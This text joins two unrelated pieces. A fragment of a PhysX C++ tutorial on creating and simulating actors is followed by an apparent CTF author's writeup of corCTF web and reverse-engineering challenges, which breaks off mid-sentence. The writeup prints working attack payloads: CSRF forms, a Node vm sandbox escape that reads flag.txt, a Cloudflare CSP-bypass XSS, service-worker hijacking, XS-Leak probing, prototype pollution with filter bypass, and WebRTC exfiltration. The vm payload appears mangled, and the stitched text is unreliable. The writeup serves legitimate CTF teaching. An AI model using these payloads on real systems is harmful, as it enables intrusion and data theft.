we created before as the second parameter. Finally, we add the actor by calling PxScene::addActor and putting the reference of plane, as shown in the following code: //1-Creating static plane PxTransform planePos =(planePos); plane->createShape(PxPlaneGeometry(), *mMaterial); gScene->addActor(*plane); The next actor we want to create is a dynamic actor having box geometry, situated 10 units above our static plane. A rigid dynamic actor can be created by calling the PxCreateDynamic() function, which requires five parameters of type: PxPhysics, PxTransform, PxGeometry, PxMaterial, and PxReal respectively. Because we want to place it 10 units above the origin, the first parameter of PxTransform will be PxVec3(0.0f,10.0f,0.0f). Notice that they component of the vector is 10, which will place it 10 units above the origin. Also, we want it at its default identity rotation, so we skipped the second parameter of the PxTransform class. An instance of PxBoxGeometry also needs to be created, which requires PxVec3 as a parameter, which describes the dimension of a cube in half extent. We finally add the created actor to the PhysX scene by calling PxScene::addActor() and providing the reference of gBox as the function parameter. PxRigidDynamic*gBox); //2) Create cube PxTransform boxPos(PxVec3(0.0f, 10.0f, 0.0f)); PxBoxGeometry boxGeometry(PxVec3(0.5f,0.5f,0.5f)); gBox = PxCreateDynamic(*gPhysicsSDK, boxPos, boxGeometry, *mMaterial, 1.0f); gScene->addActor(*gBox); Simulating PhysX Simulating a PhysX program requires calculating the new position of all of the PhysX actors that are under the effect of Newton's law, for the next time frame. Simulating a PhysX program requires a time value, also known as time step, which forwards the time in the PhysX world. We use the PxScene::simulate() method to advance the time in the PhysX world. Its simplest form requires one parameter of type PxReal, which represents the time in seconds, and this should always be more than 0, of else the resulting behavior will be undefined. After this, you need to call PxScene::fetchResults(), which will allow the simulation to finish and return the result. The method requires an optional Boolean parameter, and setting this to true indicates that the simulation should wait until it is completed, so that on return the results are guaranteed to be available. //Stepping PhysX PxReal myTimestep = 1.0f/60.0f; void StepPhysX() { gScene->simulate(myTimestep); gScene->fetchResults(true); } We will simulate our PhysX program in a loop until the dynamic actor (box) we created 10 units above the ground falls to the ground and comes to an idle state. The position of the box is printed on the console for each time step of the PhysX simulation. By observing the console, you can see that initially the position of the box is (0, 10, 0), but the y component, which represents the vertical position of the box, is decreasing under the effect of gravity during the simulation. At the end of loop, it can also be observed that the position of the box in each simulation loop is the same; this means the box has hit the ground and is now in an idle state. //Simulate PhysX 300 times for(int i=0; i<=300; i++) { //Step PhysX simulation if(gScene) StepPhysX(); //Get current position of actor (box) and print it PxVec3 boxPos = gBox->getGlobalPose().p; cout<<"Box current Position ("<<boxPos.x <<" "<<boxPos.y <<" "<<boxPos.z<<")\n"; } Shutting down PhysX Now(); } Summary We finally created our first PhysX program and learned its steps from start to finish. To keep our first PhysX program short and simple, we just used a console to display the actor's position during simulation, which is not very exciting; but it was the simplest way to start with PhysX. Resources for Article: Further resources on this subject: - Building Events [Article] - AJAX Form Validation: Part 1 [Article] - Working with Zend Framework 2.0 [Article]
https://www.packtpub.com/books/content/basic-concepts
CC-MAIN-2017-09
refinedweb
2,269
50.06
Is there an easy way to call C++ code from Java and the other way around? Created May 4, 2012 JunC++ion has a code generator that generates C++ proxy classes for Java classes. These C++ proxy classes are usable like the underlying Java classes. All communications between components in the two different languages are performed under the hood through JNI. This allows you to write C++ code like: #include "java_lang_System.h" #include "java_lang_String.h" using namespace java::lang; int main() { String test( "test" ); System::out.println( "This is a " + test ); } The code generator is capable of generating C++ proxy classes of all compiled Java classes. Therefore you can use it to This allows you to write C++ code like: - call EJB servers from C++ clients - put Swing GUIs on C++ applications - port your C++ applications to Java in small increments - provide a C++ API for your Java library and reverse - etc.
http://www.jguru.com/faq/view.jsp?EID=222752
CC-MAIN-2017-47
refinedweb
152
63.49
Introduction This tutorial provides a simple scenario to demonstrate how the Message Broker .NETCompute node can use the Open XML SDK API to interact with Microsoft Excel. A broker message flow receives an input XML file and records the hierarchy of the data into a Microsoft Excel spreadsheet. The flow parses the input file using the Broker's XMLNSC parser, so any well-formed XML input is acceptable. Having received and parsed the data, the message flow uses C# code within a .NETCompute node in order to update a Microsoft Excel spreadsheet. It records the broker's logical tree structure, which is the internal message broker representation of a message. If you are experienced with the broker, the data written into the spreadsheet will look very similar to the output of a trace node when recording the logical message tree. Each row of the spreadsheet describes an element, recording its namespace, name, value, and the data type of the value. The spreadsheet document is written to a directory on the file system by the .NETCompute node, and then the message flow File Output node copies the original input xml structure into an output file.
http://www.ibm.com/developerworks/websphere/tutorials/1202_thompson3/section2.html
CC-MAIN-2014-42
refinedweb
194
53.81
Hey everyone! This weekend, my team, the Crusaders of Rust hosted our first CTF. It was a great success, and we had a lot of incredibly smart players compete for some good prizes. I'm really thankful to all the players, and I'm really glad all of my challenges got solved and that basically everyone seemed to really enjoy them (although I heard many complaints about the difficulty 😉). Here, I'll be describing the solution to all of the challenges I made. I wrote 10 out of the 46 challenges for the CTF (although discount 3 for the sanity check, unsolvable shell, and the survey) and also set up and managed the infra with EhhThing. Special thanks to all the other organizers for making great challenges, my friends EhhThing and Drakon for helping write some web challenges with me and answer questions/DMs, Ginkoid from another team I'm on, DiceGang, for helping with the infra and questions I had, and for all the players who played and enjoyed our CTF! We had a total of 1309 registered teams, with a total of 3339 flag submissions and 904 scoring teams. 7 challenges (3 web, 3 rev, 1 pwn) had only 1 solve. The 2 kernel pwns were the only two unsolved challenges. Check out my friend Larry's (EhhThing) blog here if you want to see the writeups to his challenges. Also, follow me on Twitter here :^) buyme was a fairly easy challenge. Reading the source code, you'd find this part in the source code of the buy API route: router.post("/buy", requiresLogin, async (req, res) => { if(!req.body.flag) { return res.redirect("/flags?error=" + encodeURIComponent("Missing flag to buy")); } try { db.buyFlag({ user: req.user, ...req.body }); } catch(err) { return res.redirect("/flags?error=" + encodeURIComponent(err.message)); } res.redirect("/?message=" + encodeURIComponent("Flag bought successfully")); }); What is db.buyFlag({ user: req.user, ...req.body }); ? Well, if you don't know JavaScript, this is object destructuring. For example: { a: 1, b: 2, ...{c: 3} } creates the object {a: 1, b: 2, c: 3} - it unpacks values from the object. And looking at the db.buyFlag method, we see: const buyFlag = ({ flag, user }) => { if(!flags.has(flag)) { throw new Error("Unknown flag"); } if(user.money < flags.get(flag).price) { throw new Error("Not enough money"); } user.money -= flags.get(flag).price; user.flags.push(flag); users.set(user.user, user); }; It checks whether you have enough money using the user property provided! So if you understand destructuring, the vulnerability is simple - when sending a request to buy the flag, you can also overwrite the user object it will check for money using destructuring. So, you need to send a buy POST request that contains a fake user object that is similar to the one in the backend. Since you need to send an object over, you should use JSON to send it since the server supports it. Here's my solution: fetch(" { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ flag: "corCTF", user: { user: "strellsquad", flags: [] } }) }); (money not required since undefined < 1e+300 is false 😉) This challenge was yoinked inspired by a blog post I read a couple weeks ago, here, which talked about a JSON parsing vulnerability. The linked page just goes to a PHP site which shows the source, which is this: <?php include "secret.php"; // function isJSON($string) { json_decode($string); return json_last_error() === JSON_ERROR_NONE; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) { // $body = file_get_contents('php://input'); if(isJSON($body) && is_object(json_decode($body))) { $json = json_decode($body, true); if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) { echo "<script>\n"; echo " let url = '" . htmlspecialchars($json["url"]) . "';\n"; echo " navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\n"; echo "</script>\n"; } else { echo "nope :)"; } } else { echo "not json bro"; } } else { echo "ur not admin!!!"; } } else { show_source(__FILE__); } ?> Basically, the admin has a secret cookie on his account, and if you can satisfy all of the checks (valid JSON, has a special json key-value), the site will output JavaScript on the page to send the flag wherever you want. The challenge is, of course, trying to get the admin to send a request with both the correct cookie and JSON payload. We can deal with these challenges one at a time. For trying to send a request with the correct cookie, I know a lot of competitors tried something like sending a fetch / AJAX request from a cross-site page. Unfortunately this doesn't work because of SameSite=Lax by default. If you don't know anything about SameSite, you can read about it here. Basically, Lax cookies mean that they only get sent on navigations. So how do we send the cookie then? Well, if they only get sent on navigations, one idea that might come up is to send them using an HTML <form> tag, since that will navigate the page too! Unfortunately, this doesn't bypass SameSite Lax. But... There's some weird behavior with default cookies set without any SameSite info on Chrome - Lax+POST. Lax+POST is a temporary solution to not apply the SameSite=Lax default when the cookie is less that 2 minutes old on POST requests. So actually, using an HTML form to send the cookie with the request does work! Now for the second part - the JSON payload. Unfortunately, since we're using an HTML <form> tag, we can't send JSON payloads. We are restricted to using <input> tags to send data over, and they send post that normally looks like key=value. But wait a second, if we do something like key: {"test": "a, value: bc"}, then when the form sends it, it will look like: {"test": "a=bc"}, which is valid JSON! Sadly though, testing this out reveals that it gets sent as %7B%22test%22%3A%20%22a=bc%22%7D, which needless to say is not valid JSON. But, reading through what is possible with forms, you might come across the enctype attribute, which allows you to change HTML forms to send data as text/plain and not encode it! Here's my solution: <html> <body> <form id="form" method="post" action=" enctype="text/plain"> <input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": " </form> <script> form.submit(); </script> </body> </html> yep yep yep The vulnerability in this challenge is that normal JSON parsing in PHP (at least, from the stackoverflow articles I read), doesn't check the Content-Type header. But really, imagine using PHP anyway. readme was a simple site that decluttered URLs you sent by converting them to "reader" mode. It did this by using the JSDOM and mozilla/readability libraries, so you would have to find a vulnerability in one of these libraries. Since it wasn't an XSS challenge, and readability just seemed like it was parsing JSDOM text, it should seem likely that the vulnerability is in JSDOM. Going to JSDOM's GitHub page here, we find a section about executing scripts: Executing: To enable executing scripts inside the page, you can use the runScripts: "dangerously" option Sadly, scripts don't execute inside the page since runScripts is not set to dangerously, but... On the helper function to load the next page, you'll see an eval statement! const loadNextPage = async (dom, socket) => { let targets = [ ...Array.from(dom.window.document.querySelectorAll("a")), ...Array.from(dom.window.document.querySelectorAll("button")) ]; targets = targets.filter(e => (e.textContent + e.className).toLowerCase().includes("next")); if(targets.length == 0) return; let target = targets[targets.length - 1]; if(target.tagName === "A") { let newDom = await refetch(socket, target.href); return newDom; } else if(target.tagName === "BUTTON") { dom.window.eval(target.getAttribute("onclick")); return dom; } return; }; So, if there's a button with onclick attribute that has either text or a class name containing "next", the onclick code will be evaluated in the JSDOM sandbox. Now, what sandbox does JSDOM use? NodeJS's vm module. If you've ever used it before, you should know that it's not secure at all. From here, you can just find a vm escape payload and solve the challenge. Here's my solution: <!DOCTYPE > <html> <body> <h1>pls summarize this</h1> <h1>pls summarize this</h1> <h1>pls summarize this</h1> <h1>pls summarize this</h1> <h1>pls summarize this</h1> <button class="next" onclick="const ForeignFunction = this.constructor.constructor;const process = ForeignFunction('return process')(); const require = process.mainModule.require; require(' + require('fs').readFileSync('flag.txt'));">next</button> </body> </html> blogme was a more "traditional" (i guess) web challenge compared to the other ones. blogme was a blog (shocker!) where you could create blog posts, comment on other people's blog post, and also upload images to set as your profile picture. Checking the server code, you find that HTML is escaped everywhere except for your post text, which makes XSS very easy. Just make a post that contains a script tag! Except... The CSP is very restrictive. object-src 'none'; script-src 'self' 'unsafe-eval'; Weirdly, there's an unsafe-eval for some reason, but this looks very hard to bypass. Most players probably got stuck here. On the front page, there are three posts. The first two mean nothing, but the third one has some weird text: wow, a lot of people have signed up and posted stuff! my bandwith was starting to get a little high, but Cloudflare (wink) (NOT SPONSORED) saved the day :D Hm, what's with this reference to Cloudflare? Most of the other challenges didn't use Cloudflare, so why is this one using it, and why was it needed to be mentioned? If you're anything like me, your mind might immediately come to some of the extra features Cloudflare adds to pages automatically, like email protection. If you have an email on a page, Cloudflare will censor it with a custom JS script that they inject onto your page to prevent bots from spamming you. This might lead you to the idea that there are scripts that Cloudflare adds on your page that might give you full XSS. Since Cloudflare adds them to the site, they might be allowed under the CSP! Googling "cloudflare csp bypass unsafe-eval", you might find this tweet by the legend himself Masato Kinugawa. It's perfect! It's an HTML snippet that bypasses the CSP on Cloudflare enabled domains that have unsafe-eval. But it's too old. It's patched. But doing some MORE research, you might find that he has a new payload on this tweet, which actually works! Except now it's too long. Post lengths are restricted to max 300 characters. Masato's payload is 508 characters. Obviously it could be golfed, but down 200 characters? No shot. But there's a link that goes to ANOTHER CSP bypass by @cgvwzq, here. While one is 400, golfing it down is absolutely possible. It does require knowledge of DOM clobbering, however. Original payload: <!-- clobber --> <form id=_cf_translation> <img id=lang-selector name=blobs> <!-- source --> <output name=locale><script>alert(1)</script></output> </form> <!-- sink --> <div data-</div> <!-- scripts available in all cloduflare domains --> <script nonce="foo" src="/cdn-cgi/scripts/zepto.min.js"></script> <script nonce="foo" src="/cdn-cgi/scripts/cf.common.js"></script> <!-- need to call translate() twice --> <script nonce="foo" src="/cdn-cgi/scripts/cf.common.js"></script> Golfed: <form id=_cf_translation><img id=lang-selector name=blobs><output id=locale><script>eval(name)</script></output></form><a data-translate=value></a><script src=/cdn-cgi/scripts/zepto.min.js></script><script src=/cdn-cgi/scripts/cf.common.js></script><script src=/cdn-cgi/scripts/cf.common.js></script> Down to EXACTLY 300 characters. Perfect! To be able to run multiple payloads, I change the alert(1) in the original payload to eval(name), since we can change name on our page and it will stay on future pages. We can use this to store payloads. So, we have a two page setup. One page has a meta refresh tag, a <meta> tag that redirects people to another page. This page sets window.name to our payload, then redirects them back to another post, this one holding our golfed eval payload. So now we should have JS execution on the page! Just, where's the flag..? Looking through the source code, we see that the flag is placed commented onto a post everytime we submit a post to the admin. But, the server automatically redacts the flag, so it's not even stored in the database. The admin bot code is also provided, and we can see that it navigates to /api/comment after viewing our post, and then placing the flag in a comment. There's no XSS on /api/comment. How can we get anything to persist on that page? The answer: service workers. From this page: A service worker is a script that your browser runs in the background, separate from a web page, opening the door to features that don't need a web page or user interaction. How service workers work is if there's a JS file hosted on a domain (served with mime-type application/javascript), a service worker can be installed on any of the pages in the folders on the same level or below. So can we do this? Normally this cannot be done since it checks the mimetype is an image when we upload, but the admin can do it! How about the folder checks? Well, the file is on /api/file?id=file-id, the comment page is on /api/comment. Both are at the folder /api/, so an uploaded JavaScript file can be a service worker on the comment page! A service worker can do many things, from intercept requests to replace HTML on the page they're scoped on, but we'll just use them to replace the HTML on the /api/comment page. So the full plan is, with our JS execution, upload a JS file containing service worker code. Get the ID, then use it to install it on the /api/comment page. Replace the HTML on the /api/comment page with a form endpoint that goes to somewhere we log. Then we get the flag! My solution code is here. saasme was the challenge I thought was the hardest, but actually ended up getting two solves (both unintended). The intended solution was a long and complex chain, starting from DNS rebinding and breaking puppeteer with the Chrome DevTools Protocol (CDP) to get a reverse shell, then using CDP again to place a breakpoint and read the flag. I cowrote this challenge with EhhThing on my team, and the writeup he made is here on his blog if you want to read it! styleme was probably my favorite web challenge of the CTF. It was a Chrome extension challenge, where this extension "styleme" allowed you to install custom "stylescripts", allowing you to apply custom CSS to any pages you wanted. The extension was here on the Chrome Web Store, and you could install it on your browser. The site allows people to register and create custom stylescripts of their own. The goal is to find a hidden stylescript on the website created by the admin, where the flag is in the custom CSS added. Sadly, only the admin who can view the site on localhost can see the hidden stylescripts. But, there is a feature to test out the custom stylescripts on the admin's browser! So the plan is simple - somehow use the custom extension to search for and retrieve the hidden stylescript on the site. A lot of teams got stuck here, trying out various payloads with CSS injection. Sadly, the site has a fairly strict CSP, basically not allowing any outbound connections. The site also has a search function so you can search for the names and IDs of stylescripts. This should hopefully point you to some sort of XS-Leak attack, where you search for the flag stylescript's id character by character, and do some sort of XS-Leak attack to leak whether the search returned results or not. I think the hints should point a good picture of the target attack. hint 1: wow, that's such a weird way to parse stylescripts, huh? hint 2: this site is #amazing and #great hint 3: why don't you guys #focus more on this challenge? Hint 2 and 3 hopefully should point you to one of the common XS-Leak attacks, ID Attribute detection. From this page on the XS-Leaks wiki: The id attribute is widely used to identify HTML elements. Unfortunately, cross-origin websites can determine whether a given id is set anywhere on a page by leveraging the focus event and URL fragments. If is loaded, the browser attempts to scroll to the element with id="bar". This can be detected cross-origin by loading in an iframe; if there is an element with id="bar", the focus event fires. The blur event can also be used for the same purpose. Well, this doesn't immediately look helpful - no ID attributes on the search page change between correct and incorrect searches. But we have CSS injection! Is there a way we can use that somehow? There IS a #back element on the search page... If you look at the source code between searches that return results and searches that don't, you'll see that on positive searches, a div appears next to the #back button. On negative searches, an h5 tag appears next to the #back button. If you know any CSS, you should know the existence of the adjacent sibling selector (+). With this selector, we can select one of these positive / negative cases ( div + #back) or ( h5 + #back), and do something with it. Well, the hint talks about an id attribute selector attack, so what happens if we apply display: none to one of them? Testing it out, you should see that the ID fragment doesn't scroll to the page if the selector is hidden! So now, through CSS injection, we can create a detectable XS-Leak between the positive & negative search result. Now, how do we setup this attack. Sadly it's not as simple as creating the stylescript, since we have 1 problem: we can only have 1 url the stylescript applies to. How the extension (and by extension admin bot [pun intended]) works is that it will install a stylescript you link it to, and will navigate to the URL if it is a valid one. That's the only way to navigate the bot off-site. So, if we need to put our XS-Leaks site as the URL for the stylescript, how do we get it to apply to the site's search page as well? Well luckily, one of the features used by some stylescripts (namely the flag one) is the "global" property! Stylescripts can have global set to true, so they apply on every page. So, can we inject this property? Well, almost... Here's the code for the creation of new stylescripts. router.post("/create", requiresLogin, async (req, res) => { let { title, css, url, hidden } = req.body; if(!title || !css || !url) { req.session.error = "Missing details to create a new style."; return res.redirect("/create"); } try { new URL(url); } catch(e) { req.session.error = "Invalid URL."; return res.redirect("/create"); } if(!/^[a-zA-Z0-9 ]*$/.test(title)) { req.session.error = "Invalid title."; return res.redirect("/create"); } /* stylescript validation */ let blacklist = ["--styleme stylescript v1.0--", "---------------", "global"]; if(blacklist.some(b => title.includes(b) || url.toLowerCase().includes(b) || css.includes(b))) { req.session.error = "Stylescript contains some invalid characters."; return res.redirect("/create"); } hidden = Boolean(hidden); try { let style = await Style.create({ title, url, css, hidden }); await style.setUser(req.user); await req.user.addStyle(style); req.session.info = "New style created successfully!"; res.redirect("/"); } catch(err) { req.session.error = err.message; res.redirect("/create"); } }); As you can see, both the title and URL properties (which is the only places we can inject) have some heavy filters. The title is a no-go. But the URL just has to be a valid URL! We can smuggle newlines into this and add new properties to the stylescript... except that the property we want to add, "global", is in a blacklist. That's where the first hint comes into play. The admin bot uses a very weird JSON parsing system to parse the config files (to be fair, I actually just copied the code from my CTF team's blog system 😉). Looking at the code: const stylescript = {}; stylescript.parse = async (content) => { let code = {}; if (!content.startsWith("--styleme stylescript v1.0--\n----")) { return; } let sections = content.split("\n---------------\n").filter(Boolean); let metadata = sections[1]; let css = sections[2] for (let line of metadata.split("\n").filter(Boolean)) { let split = line.split(":"); let prop = split[0].trim().toLowerCase(), data = split.slice(1).join(":").trim(); try { code[prop] = JSON.parse(data); } catch(err) { code[prop] = data; } } code.css = css.trim(); code.hash = await sha1(`${code.title}|${code.url}|${code.css}`); code.original = content; return code; }; This code has a prototype pollution vulnerability! If prop = "__proto__" and data = {"global": 1}, the prototype of this stylescript will be polluted, setting global to true. But we can't inject this since it contains global! However, since this is being parsed by JSON.parse, we can just use some unicode escaping to bypass the filter! Inputting the URL ${URL}?\n__proto__: {"\u0067lobal": 1} through a POST request creates a global stylescript that redirects to our URL and applies to the search page. Perfect. From here, we just need to implement our id fragment searching code. Then, you can bruteforce the flag style's id character by character. Solved! I wrote a Express server for the solution that would keep track of the current id, and send the correct payload to test the next characters. My solution code is here. msgme was a website that allowed you to message people using WebSockets, and also do some fun commands like !8ball or !math. You get the flag after running the command !flag and supplying the correct secret. You get the secret by running !secret if you are the admin and messaging it to the admin. It's an XSS challenge, so we can send the admin to any site we want. So, we have to find someway to first leak the secret. Let's look at how the checks work: const help = "...?"; const secret = require("crypto").randomBytes(64).toString("base64"); const run = (ws, args, data) => { if(ws.admin && data.to === "admin") { data.msg += secret; return; } data.msg += "nope"; }; module.exports = { help, run, secret }; So ws.admin needs to be true, and data.to needs to be "admin". How is ws.admin set? router.post('/admin_login', async (req, res) => { let { password } = req.body; if(password && password === process.env.ADMIN_PASSWORD) { req.session.user = "admin"; req.session.admin = true; return res.json({ success: true }); } return res.json({ success: false }); }); Well, this seems secure. This is only accessible by the admin, so we can't do anything. But still, can we force the admin to send the !secret message? Looking at how chat messages are done, maybe we can! router.post("/send", requiresLogin, (req, res) => { let { to, msg } = req.body; if(!to || !msg) { return res.json({ success: false }); } ws.sendMessage(req.session.user, to, msg); return res.json({ success: true }); }); Now, if you remember the solve from phpme, you know that LAX+Post is a thing! So, we can send a request to /chat/send with any message we want, letting us send messages as admin. But still, we have to send it to admin, so that doesn't really help us. Looking for other vulns, one thing seems weird: what's with the weird command handling setup? const fs = require('fs'); let cmdList = [ "help", "roll", "secret", "8ball", "math", "coinflip", "flag" ]; let cmds = Object.create(null); const init = () => { for(let i = 0; i < cmdList.length; i++) { let name = cmdList[i]; let cmd = require(`./commands/${name}.js`); cmds[name] = cmd; } } const handle = (ws, data) => { let args = data.msg.split(" "); let cmd = args[0].slice(1); data.msg = `${ws.user}: `; let found = false; for(let name of Object.keys(cmds)) { if(cmd.includes(name)) { found = true; cmds[name].run(ws, args, data); } } if(found) { return data; } return false; }; module.exports = { cmds, init, handle }; It gets the first word in our message, and checks whether any of the command names match. Then it runs the command's handler method. If you look really closely at it, you'll realize that it actually allows multiple commands to run with one message! For example, the message "!flag!secret!8ball" would run all of these. And something even more strange appears if we look at the handlers - they appear to append messages together! So, basing off the order in the list above, secret would run, then 8ball would run, and flag would run after, and they would chain their messages together. Wack. But one of these commands is very special - !math. Let's look at the source code of it: const help = "2+2=4-1=3 quick maffs"; const run = (ws, args, data) => { data.msg += args.slice(1).join(" "); data.type = "sandbox"; }; module.exports = { help, run }; Seems to just set the type to something. Let's look at where this type is used in the client JavaScript: const newMessage = async (msg) => { // snip if(msg.type === "sandbox") { let code = msg.msg.split(":").slice(1).join(":"); msg.type = null; msg.msg = `${name}: ${await sandbox(code)}`; render(); return; } else { content.innerHTML = filter(msg.msg); } // snip }; Huh, so it seems to remove something from the message (the ":"), then runs our code in a sandbox. You would think this is to remove the name, since the message should start with that. But it actually doesn't remove the name, it removes the first :! So if our name has :inside, we could do something funky. Let's look at the sandbox function then: const sandbox = (code) => { return new Promise((resolve, reject) => { try { let iframe = document.createElement("iframe"); let token = (+new Date * Math.random()).toString(36).substring(0,6); iframe.src = "/sandbox"; iframe.sandbox = "allow-scripts"; iframe.style.display = "none"; iframe.onload = () => { iframe.contentWindow.postMessage({ code, token }, "*"); } window.onmessage = (e) => { if(e.data.token !== token) { return; } window.onmessage = null; resolve(e.data.res); } setTimeout(() => iframe?.remove(), 1500); document.body.appendChild(iframe); } catch(err) { iframe?.remove(); resolve("Error"); } }); }; So it loads our code in an iframe, then sends along a unique token. Then it gets the response back, and if the token matches, it'll display the text. Let's look into /sandbox more: <!DOCTYPE > <html> <head> <title>msgme sandbox</title> </head> <body> <!-- simple sandbox for fast evaluation of math :) --> <script nonce="{{nonce}}"> let done = false; let token; let finish = () => { if(done) { return; } window.parent.postMessage({ token, res: window.result || "Error" }, "*"); done = true; }; try { window.addEventListener("message", (event) => { if (event.origin !== "{{site}}") { return; } token = event.data.token; // apply nonce to bypass CSP let script = document.createElement("script"); script.nonce = "{{nonce}}"; script.innerHTML = "window.result = " + event.data.code; document.body.appendChild(script); setTimeout(finish, 250); }, false); } catch(err) { finish(); } </script> </body> </html> So it actually just runs our code. Testing this out by doing !math 5+5 and !math console.log(1), both work perfectly. So we can easily run JavaScript on this sandbox domain, but sadly that doesn't actually help very much. The sandbox is under a strict CSP: default-src 'none'; base-uri 'none'; script-src 'nonce-NONCE' 'unsafe-inline'; frame-ancestors 'self'; That basically leaves us with nothing. And the normal page has a strict CSP too: default-src 'none'; base-uri 'none'; connect-src 'self'; frame-src 'self'; script-src 'nonce-NONCE' 'unsafe-inline'; style-src 'nonce-NONCE' 'sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=' 'sha256-5uZsN51mZNPiwsxlFtZveRchbCHcHkPoIjG7N2Y4rIU='; frame-ancestors 'none'; Since frame-src 'self';, we can't navigate the iframe anywhere. And since default-src 'none';, we can't open any links, images, etc. And since the iframe is sandboxed, we can't open alerts or new tabs. And since frame-ancestors is 'none', and X-Frame-Options is DENY, we can't iframe it and access the page like that. And since Cross-Origin-Opener-Policy is sameorigin, opening the site from another page doesn't leave us with window.opener. This seems like an impossible jail to escape. Well, let's forget about this jail for a second. We have arbitrary JavaScript execution, but only with the code we supply. How does this help us in anyway? The answer is the bug we found from before, the command chaining! If we chain commands together, we could possibly create some sort of payload that would use the admin's account to send the "!secret" message to the admin, recieving the secret, while also simultaneously placing it in a !math message so that JS execution happens with it. Let's see what gadgets we have. The most useful gadgets are !roll and !8ball. Let's see how they work: const help = "Rolls a number"; const run = (ws, args, data) => { let max = 100; if(args[1] && !isNaN(args[1])) { max = parseInt(args[1]); } data.msg += `You rolled: ${Math.floor(Math.random() * max + 1)}, ${ws.user}`; }; module.exports = { help, run }; !roll seems like it does nothing, but with the command chaining, we can set our name to be in our string. Since it runs first, anything we run after roll would have our username placed right before it. const help = "Asks the mythical magic 8-ball a question"; const run = (ws, args, data) => { let question = args.slice(1).join(" "); if(!question.endsWith("?")) { question += "?"; } data.msg += question + " "; let responses = ['It is certain', 'It is decidedly so', 'Without a doubt', 'Yes – definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good', 'Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now', 'Cannot predict now', 'Concentrate and ask again', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful']; data.msg += responses[Math.floor(Math.random() * responses.length)]; }; module.exports = { help, run }; !8ball now looks powerful too, it basically appends our question to the end of the message, then a random response. Since it takes the args parameter, it takes the message before it is changed. This is useful for setting the end of our string. Now remember the !secret method again? It just appends the secret to the message. And if you look at the order of how these three commands would run, roll -> secret -> 8ball, we can basically wrap the secret in some text! Then, if we add the !math command, it'll run it as JavaScript! But wait, this doesn't seem right. If we have to login and change our name, then we will no longer be admin, right? Let's look at the login code: router.post('/login', async (req, res) => { let { name } = req.body; if(name) { if(!['admin', 'system'].includes(name) && !ws.getUser(name)) { req.session.user = name; return res.json({ success: true }); } } return res.json({ success: false }); }); While it does set our name correctly, it also doesn't disable our admin access! So we can log in the admin as another user and still keep our access for the !secret command! We now have a way to run JavaScript with the secret, albeit a bit scuffed. Abusing this command chaining and the :bug, we can get arbitrary JavaScript execution with the secret. But we're still stuck in this jail, so what can we even do? At this point, no one solved this challenge, and around ~10 hours left in the CTF, I released this hint: HINT: this messaging service is great! i know the site uses websockets, but have you heard of this new Real Time Communication technology the browser supports? (also GCP blocks some ports lol) Real Time Communication technology? WebRTC? Indeed, there are two powerful CSP bypasses that I know of that avoid everything - DNS prefetch and WebRTC. Sadly, DNS prefetch doesn't work on the headless admin bot. But also, it would be a pain to split the message and encode it so it can work as a subdomain. So, WebRTC it is. Instead of write it myself, I yoink borrow an exploit from another CTF challenge which used WebRTC, rce-auditor from BalsnCTF, which coincidentally also had 1 solve like this challenge! Their exploit for rce-auditor can be found here. Now crafting my exploit, I just simplify their code, then split it into two sections. I have my name act as the first section, then the end section will be the first argument so that !8ball picks it up. If done correctly, these two segments will wrap around the secret sent by the admin. You do have to choose a different STUN server than the challenge because GCP blocks ports. Now for the exploit plan. First, login as a new user, with a name as the first half of our payload. Then, open the site in a new tab, appending the parameter ?user=<username> so that we can automatically see the message that gets sent and run the XSS payload. Finally, send the message using a Lax+POST form submission. If done correctly, the secret is be wrapped in our WebRTC code, exfiltrating the secret to our offsite server, bypassing CSP! Now that we have the secret, we can get the flag! Almost... Running !secret <secret> returns us with the message [REDACTED] because of this funny filter: const filter = (msg) => { if(typeof msg !== "string") { msg = "[ERROR]"; } if(msg.toLowerCase().includes("corctf{")) { msg = "[REDACTED]"; // no flags for you!!!!!! } return msg; }; But if you've gotten this far, this part should only be a tiny distraction. Just open the page in devtools and run the command again - you'll see the WebSocket connection and the logs, and get the flag. Flag get! My solution code is here. babyrev was the first rev challenge, and also the easiest. Opening up in Ghidra, you can start to reverse the binary. It's just a simple rot cipher, but the rotation on each character is dependent on the next prime of the character's index * 4. Then you just have to memfrob the check data (xor by 42), to get the real characters to be rotated. Here's my solution: import string from Crypto.Util.number import isPrime def rot_n(c, n): if c.isalpha(): if c.isupper(): return string.ascii_uppercase[(string.ascii_uppercase.index(c) + n) % 26] else: return string.ascii_lowercase[(string.ascii_lowercase.index(c) + n) % 26] else: return c buff = "5f 40 5a 15 75 45 62 53 75 46 52 43 5f 75 50 52 75 5f 5c 4f".split(" ") buff = [int(c, 16) ^ 42 for c in buff] final = [] for i in range(len(buff)): p = i * 4 while not isPrime(p): p = p + 1 print(i, p, rot_n(chr(buff[i]), -p)) final.append(rot_n(chr(buff[i]), -p)) print("corctf{" + ''.join(final) + "}") flagbot was probably the coolest misc chall (imo). FlagBot was a Discord bot on our Discord server, and it sat in the #flagbot-voice channel, playing a YouTube video. The goal: find what YouTube URL it was playing. But this wasn't an OSINT challenge, this was a real hacking challenge. You had to find the unlisted YouTube URL FlagBot was playing, and the flag would be in the description. Luckily, source was provided. We can see the list of commands that are allowed using f!help, and here's how that's implemented: if(cmd === "help") { let embed = newEmbed() .setDescription("List of commands:") .addField(`${PREFIX}help`, `Shows you this menu.`) .addField(`${PREFIX}ping`, `Shows the ping of the bot.`) .addField(`${PREFIX}coinflip`, `Flips a coin.`) .addField(`${PREFIX}8ball`, `Answers your questions.`) .addField(`${PREFIX}math`, `Evaluates a math expression. [OWNER ONLY]`) .addField(`${PREFIX}status`, `Checks whether a website is online. [OWNER ONLY]`) .addField(`${PREFIX}play`, `Play song from YouTube. [AUTHOR ONLY]`) .addField(`${PREFIX}loop`, `Loop song from YouTube. [AUTHOR ONLY]`) .addField(`${PREFIX}stop`, `Stop currently playing song. [AUTHOR ONLY]`); msg.reply(embed); } There was a #bot-spam channel that players were allowed to play with the bot 